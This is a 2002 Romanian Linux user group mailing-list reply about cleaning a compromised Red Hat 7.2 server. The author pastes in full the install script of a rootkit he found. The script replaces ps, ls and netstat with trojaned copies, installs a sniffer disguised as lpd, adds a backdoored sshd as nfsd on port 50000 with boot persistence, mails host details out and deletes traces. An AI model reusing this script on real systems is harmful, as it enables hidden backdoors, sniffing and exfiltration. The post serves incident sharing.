Reinstall tot dupa care te inregistrezi cu rhn_register la rh network si dupa ce ai inscris sitemul tau la ei poti folosi "up2date -u" pentru update-uri la zi. Seamana a wingoz dar merge bine. Daca ai probleme cu conexiunea il lasi sa aduca headerele, pe care le pune in /var/spool/up2date, (ai de downloadat vreo 200 mb de updateuri) cauta un mirror apropiat la updates.redhat.com (ex: ftp.ubbcluj.ro) aduci de acolo pachetele corespunzatoare headerelor pe care le pui in /var/spool/up2date si repornesti "up2date -u".
si mie mi-a gaurit wu-ftpd-u din rh7.2 dar rootkitu era pentru alt sistem asa ca l-am gasit dupa vreo 3 ore (asteptam sa se termine "up2date -u" cu serviciile pornite de bou ce am fost:) cind ps, ls , netstat nu mergeau. asa ca am adus repede respectivele app de pe alt sistem, si surpriza... nfsd -q -p 50000 care era un sshd modificat. m-am uitat prin directoare si am gasit in /var/ftp/ un director care nu era acolo ultima data cind m-am uitat. Cautind prin fisierele din el dau de o cale la ceva director de librarii unde era cam asa ceva: . .. .lib .tooz in .tooz era fisierul install: #private version from cur / not hacked by lamme assz as Em|nem or others! #phear my reverge all u mother fuckers # rk made ONLY 4 my friends ond ONLY 4 fun #!/bin/sh unset HISTFILE chattr -iau /usr/src/linux/arch/alpha/lib/.lib/ chattr -iau /bin/ps chattr -iau /bin/ls chattr -iau /bin/netstat chattr -iau /bin/lpd rm -rf /etc/ssh* clear mkdir -p /usr/src/linux/arch/alpha/lib/.lib sh sysinfo1 > new-host sh ssh_random_key mv .1proc /usr/src/linux/arch/alpha/lib/.lib/ mv .1addr /usr/src/linux/arch/alpha/lib/.lib/ mv .1file /usr/src/linux/arch/alpha/lib/.lib/ mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls mv ps /bin/ps mv ls /bin/ls mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/ mv netstat /bin/netstat chown root.root /bin/ls chown root.root /bin/ps chown root.root /bin/netstat mv linsniffer /bin/lpd rm -rf /etc/ssh* rm -rf /usr/man/man8/rpc.rstatd.8 rm -rf /usr/sbin/rpc.rstatd rm -rf /usr/sbin/rpc* lpd & ./lpd mv sshd /bin/nfsd mv -f sshd_config /etc/ mv -f ssh_host_key /etc/ mv -f ssh_random_seed /etc/ mv -f ssh_host_key.pub /etc/ rm -rf ssh_random_key chattr +iau /bin/nfsd chattr +iau /etc/sshd_config chattr +iau /etc/ssh_host_key chattr +iau /etc/ssh_random_seed chattr +iau /etc/ssh_host_key.pub nfsd -q -p 50000 echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet ./sysinfo1 > new-host |mail -s "root6666" [EMAIL PROTECTED] cat new-host |mail -s #-----done with ssh---- killall -9 portmap killall rpc.statd rm -f /usr/sbin/rpc.statd echo "ftp">>/etc/ftpusers echo "root">>/etc/ftpusers cat /proc/cpuinfo mv pwd /dev/capi20.20 rm -f sysinfo1 rm -f sysinfo rm -f new-host rm -f sshd cd .. rm -rf s.tgz clear echo "****************************7.1***************************" echo "Oki" echo "***********************SpUrKaTu&TrUnKS********************" mai era un fisier .1addr: 2 194.105 3 6666 3 6667 3 54789 3 31337 3 6668 3 6669 3 6666 2 194.102.233 2 209.142.209.161 2 217.10 2 213.233 am pastrat fisierele ca poate nu se stie niciodata, mai sunt printre ele : hideps install lpd sense string tcp.log utils wipe .1addr .1file .1proc .ls netstat .ps cam asta ma mai gasit in general e bine ai copii originale dupa ls, ps, netstat bafta On Fri, 24 May 2002, Gabriel Stoicea wrote: > Rulez un sistem RH 7.2 pe care am depistat o intruziune. > Mi-am dat seama de asta pentru ca nu mergeau corect anumite comenzi. > 1. Am reparat pachetele compromise (net-tools, fileutils si procps) cu > rpm -U --force ... > 2. Am download-at chkrootkit si chkproc imi spune ca ruleaza 2 procese > ascunse: > - You have 1 process hidden for readdir command > - You have 1 process hidden for ps command > 3. chkrootkit "intepeneste" la verificare la pozitia > Checking 'aliens'... > 4. Cand rebootez PC-ul imi da niste erori la demontarea partitiei /usr > --> Illegal seek > 5. Cand bootez imi apar cateva mesaje cum ca un program este shareware > si nu stiu ce... si ca asculta pe portul 7000 > 6. In boot.log apare linia > ... Starting backdoor daemon... Done, pid=... > Acum va intreb: > - mai pot fi si alte pachete compromise in afara de cele numite? > - ce este cu acele procese ascunse si cum scap de ele? > - de ce intepeneste chkrootkit? > - daca este intr-adevar vorba de backdoor, cum scap de el? > > Cu speranta ca nu va "sictiresc" cu un mail asa de lung, va multumesc > anticipat pentru ajutor. > Gaby > > > --- > Pentru dezabonare, trimiteti mail la > [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > > --- Pentru dezabonare, trimiteti mail la [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. REGULI, arhive si alte informatii: http://www.lug.ro/mlist/
